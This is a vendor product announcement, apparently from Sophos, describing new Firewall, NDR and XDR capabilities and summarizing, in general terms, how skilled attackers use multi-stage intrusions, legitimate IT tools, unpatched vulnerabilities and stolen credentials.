New capabilities to further enable organizations to defend against active adversaries.
Active adversaries are now a major threat to organizations of all sizes. These highly skilled cybercriminals continue to develop and evolve their techniques in response to superior defenses, executing attacks at scale and employing sophisticated techniques specifically designed to avoid triggering preventative security solutions.
We are excited to announce the addition of new capabilities to Sophos Firewall, Sophos XDR, and Sophos NDR solutions to further enable organizations to defend against these active adversaries.
What are active adversaries and how do they operate?
Active adversaries are highly skilled cybercriminals, often equipped with sophisticated software and networking skills, who gain entry into an organization’s systems, evade detection and continuously adapt their techniques, using hands-on keyboard and AI-assisted methods to circumvent preventative security controls and execute their attacks.
Organizations need adaptive security controls designed to detect and respond to the approaches commonly used by active adversaries:
Multi-stage attacks
Attacks that end in a different place than they started
Active
adversaries execute attacks that cross multiple domains across the
victim’s environment. The full scope of these attacks cannot be detected
by a single point product. Organizations need visibility across their
entire ecosystems.
Living off the land attacks
Attacks that use legitimate tools in malicious waysPreventative security tools are unable to block the use of
legitimate IT tools without the risk of causing significant operational
disruption. Attackers take advantage of this by using legitimate IT
tools like RDP and PowerShell to blend into the background.
Unknown vulnerabilities
Attacks that leverage a weakness, flaw, or error in software
Attackers
exploit zero-day and unpatched vulnerabilities to execute attacks: 65%
of ransomware attacks start with an attacker exploiting an unknown
vulnerability or logging in using legitimate credentials.
Credential abuse
Attacks that start with an adversary logging in instead of breaking in
Active
adversaries use compromised legitimate user credentials to log in and
execute their attacks. Preventative security tools are unable to block
or detect until the “user” demonstrates suspicious or malicious
behavior.
Our new Active Adversary Report for Security Practitioners highlights key changes in adversary behavior over the last year, including:
Attackers are speeding up. Dwell time in ransomware is rapidly decreasing, down from nine days in 2022 to five days in the first half of 2023.
Adversaries frequently abuse legitimate IT tools. The LOLBins (Living-off-the-Land Binaries) and techniques being used by active adversaries do not vary substantially between fast (< five days dwell time) and slow (> five days dwell time) attacks.
Active adversaries will innovate when they must, and only to the extent that it gets them to their target.
The report highlights the need for organizations to understand how active adversaries behave and to have visibility across their security ecosystems to detect quickly and respond even faster.
What’s new?
We’re adding new capabilities to the Sophos platform across Sophos XDR, Sophos Firewall, and Sophos NDR that give organizations even greater power to defend against active adversaries:
Sophos Firewall – now with Active Threat Response
Now available!
The new Active Threat Response feature in Sophos Firewall v20 provides instant and automated response to active adversaries. Sophos XDR and MDR analysts can push threat intel to firewalls directly from Sophos Central, enabling the firewalls to coordinate defenses immediately without the need for manual intervention or new firewall rules.
Sophos NDR – now available for XDR
Available November 20, 2023
Sophos
Network Detection and Response (NDR) detects active adversaries moving
across an organization’s network between devices. Previously available
only as an add-on to Sophos MDR, Sophos NDR is now available as an
add-on to Sophos XDR, for organizations who manage their own detection
and response activities.
Sophos XDR – now with expanded third-party compatibility and optimized UX
Available November 20, 2023
We’re significantly expanding the
range of third-party tools and products that customers can integrate
with Sophos XDR, across endpoint, firewall, cloud, identity, network,
email, and productivity categories. Sophos XDR consolidates security
data and provides a single console for customers to work from, with
optimized
workflows that reduce their investigation workloads.
Point products vs. connected products and services that work together
Attackers continuously adapt their techniques, resulting in the introduction of new point products to defend against these new approaches. Disparate tools, however, typically do not communicate well together. Sophos provides a unified platform that incorporates a broad portfolio of cyber security products and services that has been engineered to work together seamlessly. Plus, compatible with third-party technologies, Sophos’ connected ecosystem provides automated actions and correlated data, allowing organizations to detect, investigate, and respond to active adversaries faster, across all key attack surfaces.